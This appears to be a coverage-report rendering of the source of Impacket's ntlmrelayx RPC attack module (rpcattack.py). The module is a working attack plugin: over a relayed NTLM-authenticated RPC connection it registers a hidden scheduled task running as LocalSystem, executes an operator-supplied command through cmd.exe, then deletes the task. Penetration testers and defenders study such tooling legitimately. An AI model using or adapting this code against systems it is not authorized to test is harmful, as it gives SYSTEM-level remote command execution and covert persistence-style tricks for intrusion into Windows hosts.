Coverage for /root/GitHubProjects/impacket/impacket/examples/ntlmrelayx/attacks/rpcattack.py : 0%

Hot-keys on this page
r m x p toggle line displays
j k next/prev highlighted chunk
0 (zero) top of page
1 (one) first highlighted chunk
1# Impacket - Collection of Python classes for working with network protocols.
2#
3# SECUREAUTH LABS. Copyright (C) 2020 SecureAuth Corporation. All rights reserved.
4#
5# This software is provided under a slightly modified version
6# of the Apache Software License. See the accompanying LICENSE file
7# for more information.
8#
9# Authors:
10# Arseniy Sharoglazov <mohemiv@gmail.com> / Positive Technologies (https://www.ptsecurity.com/)
11# Based on @agsolino and @_dirkjan code
12#
14import time
15import string
16import random
18from impacket import LOG
19from impacket.dcerpc.v5 import tsch
20from impacket.dcerpc.v5.dtypes import NULL
21from impacket.examples.ntlmrelayx.attacks import ProtocolAttack
23PROTOCOL_ATTACK_CLASS = "RPCAttack"
25class TSCHRPCAttack:
26 def _xml_escape(self, data):
27 replace_table = {
28 "&": "&",
29 '"': """,
30 "'": "'",
31 ">": ">",
32 "<": "<",
33 }
34 return ''.join(replace_table.get(c, c) for c in data)
36 def _run(self):
37 # Here PUT YOUR CODE!
38 tmpName = ''.join([random.choice(string.ascii_letters) for _ in range(8)])
40 cmd = "cmd.exe"
41 args = "/C %s" % self.config.command
43 LOG.info('Executing command %s in no output mode via %s' % (self.config.command, self.stringbinding))
45 xml = """<?xml version="1.0" encoding="UTF-16"?>
46<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
47 <Triggers>
48 <CalendarTrigger>
49 <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary>
50 <Enabled>true</Enabled>
51 <ScheduleByDay>
52 <DaysInterval>1</DaysInterval>
53 </ScheduleByDay>
54 </CalendarTrigger>
55 </Triggers>
56 <Principals>
57 <Principal id="LocalSystem">
58 <UserId>S-1-5-18</UserId>
59 <RunLevel>HighestAvailable</RunLevel>
60 </Principal>
61 </Principals>
62 <Settings>
63 <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
64 <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
65 <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
66 <AllowHardTerminate>true</AllowHardTerminate>
67 <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
68 <IdleSettings>
69 <StopOnIdleEnd>true</StopOnIdleEnd>
70 <RestartOnIdle>false</RestartOnIdle>
71 </IdleSettings>
72 <AllowStartOnDemand>true</AllowStartOnDemand>
73 <Enabled>true</Enabled>
74 <Hidden>true</Hidden>
75 <RunOnlyIfIdle>false</RunOnlyIfIdle>
76 <WakeToRun>false</WakeToRun>
77 <ExecutionTimeLimit>P3D</ExecutionTimeLimit>
78 <Priority>7</Priority>
79 </Settings>
80 <Actions Context="LocalSystem">
81 <Exec>
82 <Command>%s</Command>
83 <Arguments>%s</Arguments>
84 </Exec>
85 </Actions>
86</Task>
87 """ % (self._xml_escape(cmd), self._xml_escape(args))
89 LOG.info('Creating task \\%s' % tmpName)
90 tsch.hSchRpcRegisterTask(self.dce, '\\%s' % tmpName, xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE)
92 LOG.info('Running task \\%s' % tmpName)
93 done = False
95 tsch.hSchRpcRun(self.dce, '\\%s' % tmpName)
97 while not done:
98 LOG.debug('Calling SchRpcGetLastRunInfo for \\%s' % tmpName)
99 resp = tsch.hSchRpcGetLastRunInfo(self.dce, '\\%s' % tmpName)
100 if resp['pLastRuntime']['wYear'] != 0:
101 done = True
102 else:
103 time.sleep(2)
105 LOG.info('Deleting task \\%s' % tmpName)
106 tsch.hSchRpcDelete(self.dce, '\\%s' % tmpName)
107 LOG.info('Completed!')
110class RPCAttack(ProtocolAttack, TSCHRPCAttack):
111 PLUGIN_NAMES = ["RPC"]
113 def __init__(self, config, dce, username):
114 ProtocolAttack.__init__(self, config, dce, username)
115 self.dce = dce
116 self.rpctransport = dce.get_rpc_transport()
117 self.stringbinding = self.rpctransport.get_stringbinding()
119 def run(self):
120 # Here PUT YOUR CODE!
122 # Assume the endpoint is TSCH
123 # TODO: support relaying RPC to different endpoints
124 # TODO: support for providing a shell
125 # TODO: support for getting an output
126 if self.config.command is not None:
127 TSCHRPCAttack._run(self)
128 else:
129 LOG.error("No command provided to attack")